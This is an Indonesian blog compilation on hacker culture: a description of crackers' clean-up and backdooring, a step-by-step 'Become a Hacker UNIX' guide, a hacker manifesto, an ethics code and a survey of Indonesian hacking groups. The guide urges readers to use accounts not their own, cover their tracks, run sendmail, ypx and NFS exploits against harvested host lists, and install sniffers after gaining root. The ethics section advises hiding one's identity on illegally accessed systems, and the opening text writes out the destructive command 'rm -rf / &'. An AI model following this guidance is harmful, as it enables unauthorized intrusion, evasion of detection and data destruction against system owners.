Untuk menghilangkan jejak,seorang cracker biasanya melakukan operasi pembersihan ’clean-up’ operation dengan cara membersihkan berbagai log file.Dan menambahkan program untuk masuk dari pintu belakang ’backdooring’. Mengganti file .rhosts di /user/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri,misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ’rm -rf / &’.Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk.Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru.Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ’rm -rf / &’.Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para(Hacker bukan Cracker).Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini,bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi.Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb secara sukarela karena hobby-nya.Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet.Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia.Sebagai salah satu bentuk nyatanya,dalam waktu dekat Insya Allah sekitar pertengahan April akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu.Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net),Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id).Seperti pada umumnya anak-anak muda lainnya,mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca,khususnya pembaca muda,untuk bergerak di dunia Hacker yang mengasyikan dan menantang.Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, ”To boldly go where no one has gone before”.

Sunday, January 6, 2013

BECOME A HACKER UNIX

Jadi kamu memutuskan untuk menjadi seorang hacker UNIX tapi kamu tidak tau gimana mulainya?Sebelum kamu benar-benar mulai,pastikan bahwa hal-hal berikut ini adalah jelas:
  • Hacking adalah kerja keras.Hacking bukanlah tempat bermain anak-anak yang hanya ingin mendapat 15 menit secara cuma-cuma.Kamu harus belajar bagaimana caranya mengoperasikan dan memprogram sebuah system.Kamu mesti ngeriset bagaimana mesin-mesin bereaksi dan membaca kode-kode asli.Ini adalah proses yang panjang dan sukar – inilah peringatan untuk kamu!
  • Hacking adalah ilegal.Masuk ke jaringan komputer tanpa izin adalah ilegal,paling tidak di banyak negara (hanya Belanda dan Argentina kalo nggak salah yang belum punya hukum mengenai hacking.Belum aja,sih paling juga nanti akan ada.) Walaupun hanya log-on ke sebuah sustem dengan menggunakan account bukan milikmu adalah tindakan pidana yang bisa dikenakan hukuman.Sekali sang hakim menjatuhkan hukuman, maka hukuman tersebut akan dimasukkan ke data hidup / arsip kamu. Seluruh hidup kamu mungkin bisa terlantar karena hanya sedikit perusahaan yang bersedia menerima hacker sebagai karyawan.Ini serius.Apalagi di Indonesia.Jika kamu meng-hacking server milik pemerintah,bisa dijamin kamu akan amblas.Dan keluarga kamu nggak aman!Beberapa anggota kami nggak bisa balik lagi ke tanah air karena sudah dicekal,dan terakhir,pemerintah mulai menyelidiki asal-usul ChiKo dan mencari keluarganya di Indonesia.
  • Hacking memerlukan banyak waktu.Kamu nggak mungkin cuman nge-hack selama setengah thun,terus berhenti dan istirahat selama tiga bulan,lalu kembali lagi.Waktu berjalan cepat di internet.Rilis baru UNIX,bug-bug baru,dan juga fix-fix nya.Sekali kamu ketinggalan jaman dengan eksploit data milikmu,kamu mesti mengemis-ngemis ke orang lain untuk memberikan barang-barang baru kepadamu,dan jika kamu melakukan hal tsb terlalu sering,mereka nggak akan begitu senang jadinya.50% dari waktu hacking sebenarnya dihabiskan untuk mengumpulkan informasi.Bicaralah ke hacker-hacker lainnya,baca mailing lists dan newsgroups,jangan lupa situs-situs www dan ftp yang bagus.Tapi apa motivasi kamu untuk secara benar-benar melakukan ‘unix hacking’?Itu terserah kamu.Kamu ingin menjadi salah satunya,maka pikirkan lagi mengapa kamu ingin menjadi salah satu unix hacker.Lupakan film-film seperti “The Net” ataupun “Hackers” – film-film tsb BUKANLAH realita!Lupakan mimpi-mimpi menjadi pahlawan,mengehack Pentagon atau HanKam dan menjadi cowok terseksi,mendapat pacar-pacar yang cantik dan pada akhirnya bekerja untuk sebuah perusahaan keamanan sistem dengan gaji berjibun ;o).Hal-hal tersebut BUKANLAH apa yang akan terjadi – jadi,pastikanlah bahwa alasan kamu jelas,mengapa kamu ingin menjadi hacker dan apa yang kamu harapkan dari hacking.Bisakah kamu bayangkan ibundamu tercinta,tersedu-sedu saat polisi datang untuk menahanmu?
  • Ingatlah peringatan-peringatan ini.Ini kami jadikan peringatan untuk memastikan bahwa kamu menyadari apa yang kamu lakukan dan kamu ingin menjadi apa.Catatan juga bahwa kami menulis petunjuk singkat ini sebab seringkali kami mendapat pertanyaan dari banyak orang,“Gimana caranya supaya gue jadi jago nge-hack UNIX?” – dan dari waktu ke waktu kami menjadi makin cape ngejawabinnya.Maka inilah dia jawaban-jawabannya.Jangan salahkan kami atas ketidaklengkapan ataupun kesalahan- kami udah nggak peduli lagi dengan permintaan-permintaan ngajarin nge-hack lewat jalan potong.Hanya yang paling tahan bantinglah yang bertahan – jadi,cobalah mendapatkan sebanyak mungkin melalui teks ini jika kamu benar-benar masih pemula.Kami sendiri masih belum pantas menyandang gelar “hacker” karena kami merasa masih jauh sekali tertinggal oleh rekan-rekan kebangsaan lain dan kami masih selalu dalam proses mempelajari segalanya.Gimana cara mulainya?
  1. Kenalilah sang sistem – atau – gimana caranya kamu bisa menang rodeo tanpa belajar caranya menunggang kuda?
  2. Dapatkan distribusi unix. Cobalah mendapatkan Linux,FreeBSD,Solaris,Sinix,dll untuk PC kamu.Linux dan FreeBSD adalah sistem-sistem murah (kadang-kadang gratis!) yang berasal dari BSD,sedangkan Solaris dan Sinix adalah sistem-sistem mahal yang berasal dari System V.Tip: Carilah distribusi linux yang punya buku pegangan yang cukup bagus.Kamu mesti mempelajari bagaimana caranya mengoperasikan unix.Pelajarilah dasar-dasarnya,seperti mengganti direktori,perintah-perintah menyalin dan menghapus dan menggunakan program penyunting.
  3. Motivasi dirimu sendiri untuk secara benar-benar menggunakan UNIX.Gimana caranya memotivasi – itu terserah kamu sendiri.Mungkin dengan menggunakan databasi yang ada di distribusi unix kamu,membuat program dalam C untuk sekolah/universitas kamu,apa aja lah,yang jelas kamu mesti benar-benar menggunakan unix (seperti jamannya ngetik perintah di DOS dulu).
  4. Beli beberapa buku untuk menolong kamu.Diluar sana ada banyak,jadi,pergilah ke toko buku terkemuka,paling bagus didekat sebuah universitas,dimana banyak orang-orang yang bisa menolong memberitahukan buku-buku apa yang cukup baik mengenai unix.Buku-buku Nutshell terbitan O’reilly (dan terjemahannya) kami sukai,namun ini adalah opini pribadi.Kamu mungkin mau mulai dengan seri For Dummies terbitan IDG (banyak yang bahasa Indonesianya.Baca FAQ untuk judul-judul lain.
  5. Dapatkan internet account dengan PPP dan/atau akses shell (hubungi ISPmu).JANGAN SEKALI-KALI menge-hack atau bertukar informasi mengenai hacking (tanpa PGP) dengan menggunakan account milik kamu sendiri (atau account dibawah nama/alamat/telepon kamu!).Coba untuk mengkonfigurasikan PC unix kamu untuk menghubungkan diri ke Internet provider.Beberapa distribusi Linux dilengkapi dengan sebuah buku petunjuk dimana mereka menggambarkan gimana caranya untuk menyambungkan ke internet.Jika kamu sudah mengikuti 5 langkah tsb diatas dan mengetahui caranya mengoperasikan unix (ini akan makan waktu sekitar 2 – 8 minggu) maka kamu sebaiknya melanjutkan ke langkah berikutnya:Pelajari Dasar-Dasarnya!
  6. Kembalilah ke toko buku,kali ini carilah buku-buku mengenai unix dan keamanan internet.Beberapa buku terbitan Elex Media membahas hal ini.Buku-buku berbahasa inggris antara lain “Practical Unix Security” oleh Garfinkel and Spafford. Pelajari masalah-masalah keamanan dasar,‘holes’ dan ciri-ciri apa yang ada di unix,dan kesalahan-kesalahan apa yang sering orang-orang lakukan.
  7. Cobalah untuk mendapatkan semua informasi dan file-file yang kamu bisa temukan di internet.Selidiki situs-situs www dan ftp dan gunakan mesin pencari.Berlangganlah ke mailing list mengenai keamanan yang cukup penting dan bacalah newsgroups yang mungkin bisa jadi penting.Tanya-tanya di sekeliling di IRC mengenai situs-situs yang bagus.berikut adalah situs-situs untuk permulaan:http://wks.uts.ohio-state.edu/unix_course/unix.html atau http://www.mcsr.olemiss.edu/unixhelp/
  8. Baca dan analisa file-file hasil kumpulan kamu – dan jangan cuman dikumpulin aja.Jika kata-kata seperti suid,buffer overflow,firewall,rdist,nis,nfs,dan SATAN sudah menjadi bukan rahasia lagi bagi kamu dan kamu benar-benar mengetahui apa makna dan konsekwensi kata-kata tersebut,lanjutkan.Mulai Hacking
  9. Dapatkan sebuah account yang bukan milikmu! Coba minta dari hacker yang kamu kenal/jumpai.Atau gunakan metode-metode yang ada di FAQ.Ingatlah: jangan coba-coba nge-hack dari account milik kamu sendiri!
  10. Dengan account ini kamu bisa mencoba untuk menge-hack sistem pertamamu.Coba eksploit-eksploitmu.Tapi ingatlah untuk selalu untuk menutupi jejak (artikel akan segera menyusul) supaya account ilegal milikmu tidak menjadi sejarah setelah baru sekali dipakai!
  11. Gunakan ypx,eksploit – eksploit remote sendmail, insecure NFS exports,dlluntuk mendapatkan host-host lainnya.Kamu bisa menjadi benar-benar sukses dengan barang “lama” ini jika kamu menggunakan daftar host yang cukup besar dan skrip tulis/temukan (write/find) yang mengotomatisasi proses penge-test-an untuk kamu.Tapi dimana bisa ditemukan nama-nama host untuk membuat daftar host? Banyak kemungkinan.Coba irc/etc/hosts/www/data analisis statistik dari akses-akses internet atau www,dll.Ini akan memberikan kamu banyak host dengan account-account yang ada.
  12. Instal sebuah sniffer jika keadaan sistem memungkinkan dan kamu membobol account ‘root’! Account ini akan memperbolehkan kamu mengakses banyak account ke host-host baru. Jalankan skrip-skrip eksploit kamu.pada akhirnya paling tidak ada beberapa yang bisa digunakan.Lanjutkanlah.Menjadi seorang HackerAPA? Kamu udah berhasil nge-hack root di beberapa sistem – dan kamu masih belum juga seorang “hacker”? Kenapa tuh? Seorang hacker bukanlah seseorang yang kerjanya menge-hack sebuah site,install sebuah sniffer dan selanjutnya.Seorang hacker asli adalah seseorang yang ingin mengerti sebuah sistem,mengetahui bagaimana sang sistem bereaksi,bersenang-senang mengambil alih kekuasaan di server tersebut dan tertarik dalam menemukan bugs-bugs baru dan mengarang program-program kegunaan (tool utility) baru.Yang cocok digambarkan diatas bisa dipanggil Columbus-nya Cyberspace.
  13. Cobalah untuk berhubungan dengan hacker-hacker lainnya dan saling bertukar informasi,pengalaman,accounts,eksploits,dan file.
  14. Amati diskusi-diskusi di newsgroups,mailing lists,dan irc. Cobalah membaca RFC-RFC penting,pelajarilah C dan mulailah memprogram tools karyamu sendiri.
  15. Jangan kut-ikutan menjadi “31337″ – kamu sendiri tahu bahwa kamu udah cukup keren hackingnya (“cool”,gitu,bahasa Sunda-nya mah!) dan kamu nggak perlu untuk meyakinkan setiap orang bahwa kamu emang elit.Bertindaklah secara normal dan tolonglah orang-orang lain yang sekarang bertanya-tanya kepada kamu “gimana caranya supaya gue bisa nge-hack UNIX?”
  16. Jangan lelah.Tetaplah bertahan di kawasan per-hacking-an,selalu amati newsgroup dan mailing list dan teman teman,jangan berhenti ber-hacking ria.
Yah,segitulah dari kami, kawan-kawan, teks diatas kayaknya cukup untuk membuat para pendatang baru tersedak mulutnya.Teks tsb emang singkat dan kotor,namun mempunyai apa yang diperlukan.

Mengenal lebih jauh tentang Hacker dan Cracker

Jangan dulu punya anggapan buruk dengan yang namanya Hacker, karena anda mesti tahu seperti apa Hacker sejati itu.Masalahnya, ada sekelompok orang yang menyebut-nyebut dirinya sebagai Hacker padahal mereka itu adalah seorang Cracker.

Hacker sejati sebenarnya tidak sejahat (atau bahkan tidak jahat sama sekali) seperti yang kebanyakan dipikirkan orang.Hacker adalah sekumpulan atau beberapa kelompok yang bertujuan untuk mengembangkan ilmu pengengetahuan dan sharing informasi bebas tanpa batas.Hacker adalah seseorang yang tertarik untuk mengetahui secara mendalam mengenai kerja suatu system,komputer,atau jaringan komputer.Mereka terdiri dari para programer yang ahli jaringan.Mereka jugalah yang berjasa membangun Internet lewat pengembangan sistem operasi UNIX.

Istilah Hacker sendiri lahir sekitar tahun 1959 dari MIT(Massacusetts Institute of Technology),sebuah universitas di Amerika yang  terdiri dari orang-orang cerdas namun cenderung tidak mempercayai adanya Tuhan (Atheis).Saat itulah semua berawal,dari sebuah ruangan baru,“EAM room” pada Building 26 MIT,sebuah tempat yang merupakan nenek moyang dari “dunia baru” yang kini kita kenal,tempat nenek moyang sebuah mesin yang kini kita sebut sebagai “komputer”,mesin yang mampu membawa kita menuju kelebihbaikan dengan kebebasan informasi,dunia para Hackersejati.

Para Hacker selalu bekerjasama secara sukarela menyelesaikan masalah dan membangun sesuatu.Mereka selalu berbagi informasi,memberi jawaban serta berlomba-lomba untuk berbuat yang terbaik agar dihormati di lingkungannya.Mereka tidak pernah berhenti belajar untuk menjadi ahli dan sangat anti untuk melakukan sesuatu berulang-ulang dan membosankan.Mereka berpedoman pada kata-kata bijak : “Untuk mengikuti jalan – pandanglah sang ahli – ikuti sang ahli – berjalan bersama sang ahli – kenali sang ahli -jadilah sang ahli ”

Sementara itu,para cracker sibuk untuk memuaskan diri mereka dengan aktivitas Cracking.Mulai dari membobol komputer,menebar virus(tanpa tujuan – beberapa Hacker sejati ada yang menulis virus namun dengan tujuan yang jelas),hingga mengakali telepon (Phreaking).Para Hacker menyebut mereka sebagai orang malas yang tidak bertanggung jawab.Jadi,sangat tidak adil jika kita tetap menganggap bahwa Hacker itu jahat dan menakutkan karena sangat jelas bahwa Hacker bersifat membangun sementara Cracker bersifat membongkar.

Ingin jadi seorang Hacker?? Tidak ada kata sulit bagi mereka yang mau belajar.Untuk menjadi seorang Hacker anda harus menguasai beberapa bahasa pemrograman dan tentu saja sikap-sikap yang bisa membuat anda diterima di lingkungan mereka.Biasanya calon Hacker memulai dengan belajar bahasa [Python] karena bahasa ini tergolong bahasa pemrograman yang termudah.Bahasan mengenai bahasa ini bisa anda lihat di www.python.org.Setelah itu anda juga harus menguasai [java] yang sedikit lebih sulit akan tetapi menghasilkan kode yang lebih cepat dari Python,[C],[C++] yang menjadi inti dari UNIX, dan [Perl] (www.perl.com) serta [LISP] untuk tingkat lanjut.

Setelah menguasai semua kemampuan dasar diatas, calon Hacker disarankan untuk membuka salah sati versi UNIX open-source atau mempelajari LINUX, membaca kodenya, memodifikasi dan menjalankannya kembali. Jika mengalami kesulitan, disarankan untuk berkomunikasi dengan club pengguna Linux [www.linpeople.org]Sisi menarik dari seorang Hacker adalah dimana mereka saling bahu-membahu dalam menyelesaikan sebuah masalah dan membangun sesuatu.Tetapi sayangnya,kehidupan mereka yang menghabiskan 90% waktunya untuk aktivitas Hacking bukanlah hal yang baik.Kalau memang benar-benar ingin jadiHacker,jadilah Hacker yang baik dengan memanfaatkan Teknologi Informasi untuk mengembangkan da’wah Islam.

——————————
Manifesto Sang Hacker
——————————

It happened again today.Another one sold out, sacrificing their dreams to the corporate security machine.
Damn whitehats, noone believes in a cause anymore.
Another bug was released today to the security mailing lists.
Damn Whitehats, they know not what they do.
Another potential computer genius was relegated to an existence of nothing more than a 9-5 cubicle-dwelling promotional tool.
Damn whitehats, putting money before discovery.
Another family was ravaged by cooperations and governments bent on instituting control over individuality, monitoring every action..
Another kid was sentenced today for searching for a way to understand the world. Convicted and imprisoned, not because of what he did, but because of what others thought he could do.
Damn Whitehats – Fear keeps them in business.
The public, believing anything it hears from “reputed experts”. Screaming for blood. Looking for something to blame for their lost hope. Their lost ability to seek out new knowledge. Fear consumes them. They cannot let go of their uncertainty and doubt because there is no meaning. They seek to destroy explorers, outlaws, curiosity seekers because they are told too. They are told these people that seek information are evil. Individuality is evil. Judgment should be made based upon a moral standard set in conformity rather than resistance. Lives are ruined in the name of corporate profit and information is hoarded as a commodity.
Damn Whitehats, you were once like us.
I was a Whitehat. I had an awakening. I saw the security industry for what is really is. I saw the corruption, the lies, the deceit, the extortion of protection money in the form of subscription services and snake-oil security consultants.
I wanted to know, I wanted to understand, I wanted to go further then the rest. I never want to be held down by contracts and agreements.
You say I should grow up. You say I should find better things to do with my time. You say I should put my talent to better use. You’re saying I should fall in line with the other zombies and forget everything I believe in and shun those with my drive, my curiosity, tell them it’s not worth it, deny them of the greatest journey they will ever experience in their lives.
I am not a blackhat. The term is insulting, it implies I am the opposite of you. You think i seek to defeat security, when I seek something greater. I will write exploits, travel through networks, explore where you are afraid to go. I will not put myself in the spotlight and release destructive tools to the public to attract business. I will not feed the fear and hysteria created by the security industry to increase stock prices. I can, and will, code and hack and find out everything I can for the same reasons I did years ago.
I am a Hacker, dont try to understand me, you lost all hope of that when you crossed the line. You fail to see the lies and utter simplicity behind the computer security industry. Once, you may have shared my ideals. You fail to see the fact that security is a maintenance job.
Youve given up hope for something better. You fail to see yourself as worthless, fueling an industry whose cumulative result is nothing. I dont hate you, I dont even really care about you – If you try to stop me, you will fail, because I do this out of love — you do it for money.
This is our world now.. the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt cheap if it wasn’t run by profiteering gluttons, and you call us criminals. We explore… and you call us criminals. We seek after knowledge… and you call us criminals. We exist without skin color, without nationality, without religious bias… and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat and lie to us and try to make us belive it is for our own good, yet we’re the ciminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a Hacker, and this is my manifesto. You can’t stop me, and you certainly can’t stop us all.

————————
Etika Hacker
————————

* Akses ke komputer-komputer – dan segala sesuatu yang berpotensi untuk mengajarmu mengenai dunia ini haruslah bebas dan total. Semua informasi haruslah tersedia secara bebas / cuma-cuma.
* Jangan percaya otoriter/kemapanan – dukung desentralisasi.
* Hackers haruslah dinilai berdasarkan kemampuan hackingnya – bukannya berdasar kriteria seperti derajat,umur,ras,atau posisi. Anda bisa berkarya seni dan keindahan melalui komputer.Komputer dapat merubah hidupmu menuju kelebih baikan.

Sedangkan dalam prakteknya,Etika Hacker diatas (prinsip) dipraktekkan dengan mengikuti kode etik:
* Jangan merusak sistem manapun secara sengaja(rmrf hard disk, crash, overflow, dll.Mengubah tampilan index.html sebuah website sah-sah saja asalkan file aslinya disimpan di sistem yang sama dan bisa diakses oleh administrator).
* Jangan mengubah file-file sistem selain yang diperlukan untuk mengamankan identitas anda.
* Jangan meninggalkan nama asli anda (maupun orang lain),handle asli,maupun nomor telepon asli di sistem apapun yang anda akses secara ilegal.Mereka bisa dan akan melacak anda dari handle anda.
* Berhati-hatilah dalam berbagi informasi sensitif.Pemerintah akan menjadi semakin pintar.Secara umum,jika anda tidak mengenal siapa sebenarnya lawan bicara/chatmu,berhati-hatilah!
* Jangan memulai dengan mentargetkan komputer-komputer milik pemerintah.Ya,ada banyak sistem milik pemerintah yang cukup aman untuk di-hack,namun resikonya lebih besar dari keuntungannya.Ingat,pemerintah punya dana yang tak terbatas dibanding dengan ISP/Perusahaan yang objektifnya adalah untuk mencari profit.

————————————
Tingkatan-tingkatan Dalam Dunia Hacker
————————————

Elite :
Juga dikenal sebagai 3l33t,3l337,31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan.Mereka mengerti sistemoperasi luar dalam,sanggup  mengkonfigurasi &  menyambungkan jaringan secara global.Sanggup melakukan pemrogramman setiap harinya.Sebuah anugrah yang sangat alami,mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat.Mereka seperti siluman dapat  memasuki sistem tanpa di ketahui,walaupun mereka tidak akan menghancurkan data-data.Karena mereka selalu mengikuti peraturan yang ada.

Semi Elite:
Hacker ini biasanya lebih mudadaripada Elite.Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer.Mereka mengerti tentang sistem operasi (termasuk lubangnya).Biasanya dilengkapi dengan sejumlah kecilprogram cukup untuk mengubah program eksploit.Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini,sialnya oleh para Elite mereka sering  kali  di kategorikan Lamer.

Developed Kiddie:
Sebutan ini terutamakarena umur kelompok ini masih muda (ABG)&masih sekolah. Mereka membaca tentang metoda hacking &  caranya  di  berbagai   kesempatan.Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX,tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

Script Kiddie:
Seperti developed kiddie,Script Kiddie biasanya melakukan aktifitas di atas.Seperti juga Lamers,mereka hanya mempunyai  pengetahuan teknis networking yang sangat minimal.Biasanya tidak lepas dari GUI.Hacking dilakukan menggunakan trojan untuk   menakuti dan menyusahkan hidup sebagian pengguna Internet.

Lamer:
Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-beHacker).Mereka biasanya membaca atau mendengar tentang Hacker dan ingin seperti itu.Penggunaan komputer mereka terutama untuk main game,IRC,tukar menukar software prirate,mencuri kartu kredit.Biasanya melakukan hacking menggunakan software trojan,nuke&DoS.Biasanya menyombongkan diri melalui IRC channel dsb.Karena banyak kekurangannya untuk   mencapai elite,dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

———————————
Hacking Scene di indonesia
———————————

Pada era 80-an hingga 1994, lahirlah para Hacker Indonesia yang boleh dibilang masih “ASLI”.Pada umumnya mereka lahir secara otodidak dan secara kebetulan memiliki akses jaringan.Biasanya terdiri dari para pegawai perusahaan-perusahaan besar atau instansi-instansi pemerintah.Mereka ini terdiri dari orang-orang yang berkecimpung di bidang UNIX,VAX/VMS,dan tentu saja ahli jaringan.

Ketika Internet mulai marak di Indonesia,mulailah masyarakat begitu antusias mempelajari komputer terutama network security.Jika dulunya tidak ada aktivitas yang bersifat merusak,kini perlahan hal itu mulai berubah.Remaja-remaja ABG mulai “berterbangan” di Internet,mencari tutorial-tutorial baru, mencari pengetahuan-pengetahuan komputer yang tidak mereka dapatkan di sekolah.Mereka menjadi semakin pintar, bahkan melebihi guru-guru di sekolah mereka.

Namun layaknya seorang ABG,sebagian besar dari mereka jiwanya masih labil.Pengetahuan mereka masih sangat minim dan memiliki semangat tinggi untuk merusak.Mereka masih belum mengerti arti “Hack” yang sebenarnya.Mereka dengan sombong dan tidak tau malu menyebut diri merekaHacker hanya karena berhasil mengakali Billing,menjalankan email BOMB,menjalankan exploit-exploit.Padahal mereka sama sekali tidak tau bagaimana tool yang mereka gunakan itu sendiri bekerja.Mereka tidak mengenal sang system,namun dengan sombong mereka menyebut dirinyaHacker.Tanpa tau apa itu TCP/IP namun dengan bangga menyebut dirinya Hacker.Padahal para Hacker sejati di Indonesia yang kemampuannya sudah setara dengan para wizard di Amerika dengan tegas menolak dirinya disebut Hacker lantaran masih selalu merasa ilmu yang dimilikinya belum cukup.Yeah, inilah Hacking Scene (pangung perhackingan) di Indonesia yang cukup menyedihkan ^_^ namun bisa juga diangap wajar dan manusiawi :)

Akan tetapi tidak semua dari mereka yang hanya bermulut besar. Tentu saja pasti ada diantaranya yang benar-benar memiliki kemampuan walaupun jumlahnya sedikit.Mereka yang sedikit ini kemudian banyak yang mengadakan pertemuan-pertemuan baik secara sengaja maupun tidak sengaja.Mereka tetap berexplorasi dan mencari pengetahuan,beraktivitas seperti biasa di lingkungannya tanpa menimbulkan kecurigaan atau prasangka dari masyarakat sekitarnya.

Dari pertemuan-pertemuan yang dilakukan,mulailah bermunculan organisasi-organisasi Hacker dan Cracker.Diantaranya yang cukup ternama ialah: AntiHackerlink (sudah tidak kedengaran lagi keberadaannya), Crack Sky (biasa juga dikenal sebagai Cracker Society),sebuah organisasi Underground yang berpusat di Surabaya,Kecoak Elektronik,ECHO,Jasakom Community,IndoHack,Secreet Colony,dan masih banyak lagi.Pada umumnya setiap daerah memiliki organisasi-organisasi sendiri dan nama organisasi disesuaikan dengan daerah asal mereka.Misalnya untuk komunitasHacker Batam biasa menyebut dirinya Batam Hacker,untuk daerah malang biasa menyebut dirinya MalangHackerlink,dan lain sebagainya.

Aktivitas-aktivitas yang kini mereka lakukan cukup beragam.Pada umumnya ialah memoderasi forum-forum dan milis besar,menjadi OP di IRC-IRC Channel ternama,saling berbagi pengetahuan dengan menulis tutorial-tutorial,Artikel,Advisories seputar bugs-bugs baru beserta cara pencegahannya,mengadakan seminar-seminar tentang Network Security,menulis program open-source, serta melakukan berbagai aktivitas “Hack” sebagai sarana pemenuhan kebutuhan untuk berexplorasi.

Pada umumnya para Hacker peka terhadap keadaan lingkungannya.Anggapan bahwa mereka adalah orang-orang yang individualis dan egois tampaknya harus segera dihapuskan. Hal ini telah lama terbukti,anda bisa menyaksikan sendiri bagaimana pertarungan para Hacker Indonesia dengan Hacker-Hacker Malaysia saat negara itu ingin merampas Ambalat dari Indonesia.Atau perseteruan Hacker Indonesia melawan Hacker-Hacker dari Australia saat mereka mengusik Indonesia.Inilah cara berbeda para Hacker dalam mempertahankan negaranya,bukan dengan senjata,bukan dengan kekerasan,namun dengan ilmu pengetahuan.
 
Cyber Underground © 2013 Templates | LockBoyz